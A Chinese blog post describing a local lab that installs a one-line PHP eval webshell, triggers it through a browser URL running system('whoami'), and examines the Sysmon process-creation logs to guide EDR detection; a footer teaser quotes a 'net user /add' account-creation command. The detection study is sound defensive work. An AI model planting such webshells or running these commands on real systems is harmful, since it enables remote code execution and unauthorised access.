首页 > 系统相关 >webshell后门中执行交互命令看到的sysmon数据采集和检测

webshell后门中执行交互命令看到的sysmon数据采集和检测

时间:2023-06-01 11:07:50浏览次数:52  
标签:webshell 6267 exe Windows cmd sysmon 0bf95bee 交互 whoami

下载phpstudy,链接:https://public.xp.cn/upgrades/phpStudy_64.zip,如下图启动wnmp。

webshell后门中执行交互命令看到的sysmon数据采集和检测_安全分析

 

 

webshell内容:

<?php echo "Your response is: ";?>

<?php @eval($_GET['cmd']);?>

写入C:\phpstudy_pro\WWW下的shell.php文件。

 

浏览器执行命令:

localhost/shell.php?cmd=system(%27whoami%27);

 

注意有一个;

然后界面返回:

webshell后门中执行交互命令看到的sysmon数据采集和检测_php_02

 

 

看看sysmon的数据采集:有2条

webshell后门中执行交互命令看到的sysmon数据采集和检测_Windows_03

 

 一条数据是关于system是启动cmd进程:

Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:16.986
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ProcessId: 5512
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe /c "whoami"
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentProcessId: 3952
ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe
ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe
ParentUser: DESKTOP-92JS9SJ\bonel

 另外一条是cmd里启动whoami:

Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:17.010
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
ProcessId: 4368
Image: C:\Windows\System32\whoami.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentProcessId: 5512
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe /c "whoami"
ParentUser: DESKTOP-92JS9SJ\bonel

 

因此,EDR里检测,应该就是检测parent(的partent)进程是否有whoami.

 

标签:webshell,6267,exe,Windows,cmd,sysmon,0bf95bee,交互,whoami
From: https://blog.51cto.com/u_11908275/6392847

相关文章

  • windows下通过net user add和powershell添加用户,sysmon仅仅采集到进程,而在windows安全
    执行操作:C:\Windows\system32>netuser/add"jack""fuckoff"命令成功完成。C:\Windows\system32>powershellWindowsPowerShell版权所有(C)MicrosoftCorporation。保留所有权利。尝试新的跨平台PowerShellhttps://aka.ms/pscore6PSC:\Windows\system32&g......
  • 我的sysmon配置,默认配置就看到了进程采集,其他数据采集还是要配置下的
    我的效果:运行:REGADDHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/veKey/tREG_SZ/d"powershell-filehelloword.ps1"   我的配置文件:Sysmon64.exe-cmyconfig.xml<!--sysmon-config|ASysmonconfigurationfocusedondefault......
  • anaconda tensorflow tflearn 自动安装脚本 anaconda使用-b可以非交互式安装
    install_dir=/usr/local/anaconda3DIR="$(cd"$(dirname"${BASH_SOURCE[0]}")"&&pwd)"#scriptdirbash$DIR/Anaconda3-5.0.1-Linux-x86_64.sh-b-p$install_dir$install_dir/bin/condainstall--use-local$DIR/mo......
  • 网页接入硬件交互通信方案
    我们都知道,网页直接接入硬件并与硬件交互并不那么方便,如果硬件由网络功能还可以通过网络通信实现(一般是socket),但大多数情况下硬件还是直接通过usb/串口等硬接线接入。很早以前有一种解决方案是Active-X,但只支持IE浏览器,尤其现在2023年IE已经并入Edge浏览器,这一方案已经过时。那么......
  • 利用JSP交互式打印表格
    问题:在客户端输入要打印表格的行数rows和列数cols,然后经过服务端处理打印rows*cols的表格,打印数据为i*j。html部分:文件名:input.html<html><head><title>Hello</title></head><body><formaction="input.jsp"method="post"><tablebord......
  • 常见控件交互方法
    点击方法element.click()输入操作element.send_keys('appium')设置元素的值element.set_value('appium')清除操作element.clear()是否可见element.is_displayed()返回True/False是否可用element.is_enabled()返回True/False是否被选中element.is_selected()返回True/Fal......
  • 开源软件架构总结之——Bash(readline做输入交互式,词法语法分析,进程交互)
    第3章TheBourne-AgainShellBash的主要组件:输入处理,解析,单词展开(wordexpansion)和其他命令处理,管道(pipeline)中的命令执行。这些组件构成一个流水线(pipeline),从键盘或脚本中获取字符,然后逐步转化为命令。图3.1Bash组件结构 3.7.经验教训3.7.1.什么是重要的参与到Bash项目......
  • wireshark解析RTSP交互
    RTSP信令交互RTSP协议即实时流协议(RealTImeStreamingProtocol,RTSP)是一种网络应用协议,用以控制流媒体服务器信息交互。大多数RTSP服务器使用实时传输协议(RTP)和实时传输控制协议(RTCP)结合媒体流传输。即客户端和服务器先进行RTSP交互,获取服务端可用命令,以及媒体参数;之后传输数据......
  • 数据的新时代:可交互大屏展现数字孪生的奇妙效果
    可交互的数字孪生数据大屏依赖于强大的数据可视化技术。通过将大量的数据转化为可视化的图表、图形和动画,大屏能够直观地展示数据的关联性、趋势变化和异常情况。这种视觉化的展示方式使得人们能够更快速地理解数据,洞察数据中的规律和价值。 在山海鲸可视化中,将3D模型导入可视......
  • 谷歌浏览器在用户与Document无交互时无法播放声音问题 - 记录
    谷歌禁止声音播放处理方式1、设置google浏览器,点击地址前面的图标,选择网站设置,找到声音,设置允许,需要用户配合设置2、使用window.AudioContext,需要自己写代码 接口参考地址:https://developer.mozilla.org/zh-CN/docs/Web/API/AudioContext3、使用组件,如:soundman......